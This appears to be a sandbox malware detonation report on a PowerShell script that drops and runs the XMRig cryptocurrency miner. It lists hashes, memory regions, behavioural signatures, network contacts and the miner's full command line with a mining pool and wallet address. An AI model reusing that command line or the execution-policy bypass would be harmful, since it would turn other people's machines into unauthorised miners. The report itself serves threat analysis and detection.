MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/988-9-0x000001B133C10000-0x000001B133C32000-memory.dmp

memory/988-10-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/988-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/988-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/988-14-0x000001B133E00000-0x000001B133E12000-memory.dmp

memory/988-15-0x000001B133CF0000-0x000001B133CFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1312-46-0x00000280A1440000-0x00000280A1460000-memory.dmp

memory/1312-47-0x00000280A2BB0000-0x00000280A2BD0000-memory.dmp

memory/1312-48-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-50-0x00000280A2BF0000-0x00000280A2C10000-memory.dmp

memory/1312-49-0x00000280A2BD0000-0x00000280A2BF0000-memory.dmp

memory/1312-51-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/988-52-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/988-53-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

memory/1312-54-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-57-0x00000280A2BF0000-0x00000280A2C10000-memory.dmp

memory/1312-56-0x00000280A2BD0000-0x00000280A2BF0000-memory.dmp

memory/1312-55-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-58-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-59-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-60-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-61-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-62-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-63-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-64-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-65-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-66-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-67-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-68-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-69-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-70-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-71-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-72-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-73-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-74-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-75-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-76-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-77-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-78-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-79-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-80-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-81-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-82-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-83-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-84-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-85-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-86-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-87-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-88-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-89-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-90-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-91-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-92-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-93-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-94-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-95-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-96-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-97-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-98-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-99-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-100-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-101-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-102-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-103-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-104-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-105-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-106-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-107-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-108-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-109-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-110-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-111-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-112-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-113-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-114-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-115-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

memory/1312-116-0x00007FF700CC0000-0x00007FF7018F3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:20

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1759s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/3384-0-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/3384-5-0x0000025B7F240000-0x0000025B7F262000-memory.dmp

memory/3384-6-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-10-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-9-0x0000025B7F450000-0x0000025B7F4C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3kgppxs.gj5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3384-25-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-48-0x0000025B7F410000-0x0000025B7F422000-memory.dmp

memory/3384-61-0x0000025B7F290000-0x0000025B7F29A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2140-90-0x000002535A950000-0x000002535A970000-memory.dmp

memory/3384-91-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/3384-92-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/2140-93-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/3384-94-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/2140-95-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-96-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-97-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-98-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-99-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-100-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-101-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-102-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-103-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-104-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-105-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-106-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-107-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-108-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-109-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-110-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-111-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-112-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-113-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-114-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-115-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-116-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-117-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-118-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-119-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-120-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-121-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-122-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-123-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-124-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-125-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-126-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-127-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-128-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-129-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-130-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-131-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-132-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-133-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-134-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-135-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-136-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-137-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-138-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-139-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-140-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-141-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-142-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-143-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-144-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-145-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-146-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-147-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-148-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-149-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-150-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-151-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-152-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-153-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-154-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-155-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

memory/2140-156-0x00007FF766E40000-0x00007FF767A73000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:21

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1749s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

memory/1460-0-0x00007FFFB76B3000-0x00007FFFB76B5000-memory.dmp

memory/1460-10-0x000002AE71BB0000-0x000002AE71BD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pkrgxjah.lm2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1460-11-0x00007FFFB76B0000-0x00007FFFB8171000-memory.dmp

memory/1460-12-0x00007FFFB76B0000-0x00007FFFB8171000-memory.dmp

memory/1460-14-0x00007FFFB76B0000-0x00007FFFB8171000-memory.dmp

memory/1460-15-0x000002AE71C40000-0x000002AE71C52000-memory.dmp

memory/1460-16-0x000002AE71920000-0x000002AE7192A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1228-47-0x0000027F11530000-0x0000027F11550000-memory.dmp

memory/1228-48-0x0000027F11570000-0x0000027F11590000-memory.dmp

memory/1228-49-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1460-50-0x00007FFFB76B3000-0x00007FFFB76B5000-memory.dmp

memory/1228-51-0x0000027F11590000-0x0000027F115B0000-memory.dmp

memory/1460-52-0x00007FFFB76B0000-0x00007FFFB8171000-memory.dmp

memory/1228-53-0x0000027F115B0000-0x0000027F115D0000-memory.dmp

memory/1228-54-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1460-55-0x00007FFFB76B0000-0x00007FFFB8171000-memory.dmp

memory/1228-56-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-58-0x0000027F11590000-0x0000027F115B0000-memory.dmp

memory/1228-57-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-59-0x0000027F115B0000-0x0000027F115D0000-memory.dmp

memory/1228-60-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-61-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-62-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-63-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-64-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-65-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-66-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-67-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-68-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-69-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-70-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-71-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-72-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-73-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-74-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-75-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-76-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-77-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-78-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-79-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-80-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-81-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-82-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-83-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-84-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-85-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-86-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-87-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-88-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-89-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-90-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-91-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-92-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-93-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-94-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-95-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-96-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-97-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-98-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-99-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-100-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-101-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-102-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-103-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-104-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-105-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-106-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-107-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-108-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-109-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-110-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-111-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

